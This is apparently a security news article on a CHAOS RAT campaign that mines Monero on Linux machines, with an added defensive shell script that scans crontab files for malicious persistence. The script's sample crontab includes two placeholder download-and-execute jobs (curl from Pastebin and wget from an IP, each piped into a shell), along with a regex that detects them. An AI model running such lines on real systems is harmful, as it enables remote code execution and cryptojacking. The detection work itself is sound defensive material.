A new threat actor has been spotted using the Go-based CHAOS remote access trojan (RAT) in a cryptocurrency mining campaign. According to Trend Micro, the campaign targets Linux systems and has been operating quietly since November 2022.
The campaign begins with a simple infection. The malware then turns on the victim's machine and its resources: it first kills security software and competing processes on the device, and finally installs a miner for the Monero (XMR) cryptocurrency.
Crypto Mining Campaigns
Upon further investigation, the researchers found that the malware maintains persistence by modifying the /etc/crontab file so that the system re-downloads the payload from Pastebin every 10 minutes.
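The persistence mechanism described above leaves a recognisable trace in the system crontab: a job that runs at a short interval and fetches a script from pastebin.com (or pipes a download straight into a shell). The following POSIX shell script is an added example, not code from the Trend Micro report or from the malware; it scans crontab-format text for that pattern. The sample crontab, the Pastebin URL and the 198.51.100.1 address are constructed placeholders, and the 15-minute threshold and regex are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example: hunt for crontab entries that match the CHAOS persistence
# pattern (short interval + payload re-downloaded from pastebin or piped to sh).
# Constructed sample input; in practice feed it /etc/crontab, /etc/cron.d/*
# and the output of `crontab -l -u <user>` for each user.

SAMPLE_CRONTAB='# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/10 *  * * *   root    curl -fsSL https://pastebin.com/raw/EXAMPLE | sh
*/5 *   * * *   root    wget -qO- http://198.51.100.1/stage.sh | bash
0 3     * * *   root    /usr/local/bin/backup.sh'

# Assumed indicators: a pastebin.com URL anywhere in the command, or a
# curl/wget invocation whose output is piped into sh or bash.
SUSPICIOUS_RE='pastebin\.com|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'

# cron_min_interval MINUTE_FIELD -> approximate run interval in minutes:
#   "*"      -> 1 (every minute)
#   "*/N"    -> N
#   "a,b,c"  -> 60 / number of listed minutes
#   anything else (single value, range, @hourly...) -> 60 (hourly or rarer)
cron_min_interval() {
  case "$1" in
    '*')    echo 1 ;;
    '*/'*)  echo "${1#\*/}" ;;
    *)      n=$(printf '%s' "$1" | tr -cd ',' | wc -c)
            echo $((60 / (n + 1))) ;;
  esac
}

# flag_suspicious_cron reads crontab lines on stdin and prints every job that
# runs at least every 15 minutes AND matches SUSPICIOUS_RE.
# Returns 0 if at least one job was flagged, 1 otherwise.
flag_suspicious_cron() {
  found=1
  while read -r minute hour dom mon dow rest; do
    case "$minute" in
      ''|'#'*|*=*) continue ;;       # blank line, comment, or VAR=value line
    esac
    interval=$(cron_min_interval "$minute")
    [ "$interval" -le 15 ] || continue
    if printf '%s\n' "$rest" | grep -Eq "$SUSPICIOUS_RE"; then
      printf '%s %s %s %s %s %s\n' "$minute" "$hour" "$dom" "$mon" "$dow" "$rest"
      found=0
    fi
  done
  return $found
}

# Stand-alone usage against the constructed sample:
printf '%s\n' "$SAMPLE_CRONTAB" | flag_suspicious_cron || echo "no suspicious cron entries"
```

Only the two constructed download-and-execute jobs are reported; the stock run-parts and backup entries are ignored because they run hourly or less often and fetch nothing. The interval heuristic is deliberately coarse (ranges such as `5-30` are treated as hourly), so treat a hit as a lead to inspect, not as proof of compromise, and pair it with the other indicators the report lists (killed security tooling, the miner process, the C2 connections).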
Trend Micro published a detailed report on the campaign last month. It noted that the routine of killing competing malware such as Kinsing, and of eliminating anything else that consumes resources and degrades mining performance, has not changed.
“The initial phase saw attackers trying to kill off competing malware, security products, and other cloud middleware. Routines followed this for persistence and payload execution, which in most cases is a Monero (XMR) cryptocurrency miner,” read the report.
Moreover, the primary downloader script and the other payloads used in the attacks were hosted at several different locations at all times.
This redundancy ensured that the campaign stayed active even if a target discovered one payload location and cut off the connection to it.
According to the researchers, the campaign's main server was hosted in Russia; that C2 server was used to deliver the payloads to the victims' devices.
The CHAOS RAT itself connected to a second C2 server, most likely located in Hong Kong. Once the payload is installed and the RAT is launched, it connects to that C2 server at its address and default port, authenticating with a JSON Web Token (JWT).
Using the /device command, the malware sends detailed information about the infected machine to the C2 server. The Go-based RAT supports downloading and uploading files, taking screenshots, opening a reverse shell, browsing the file system, opening URLs on the victim's device, and controlling the machine's power options.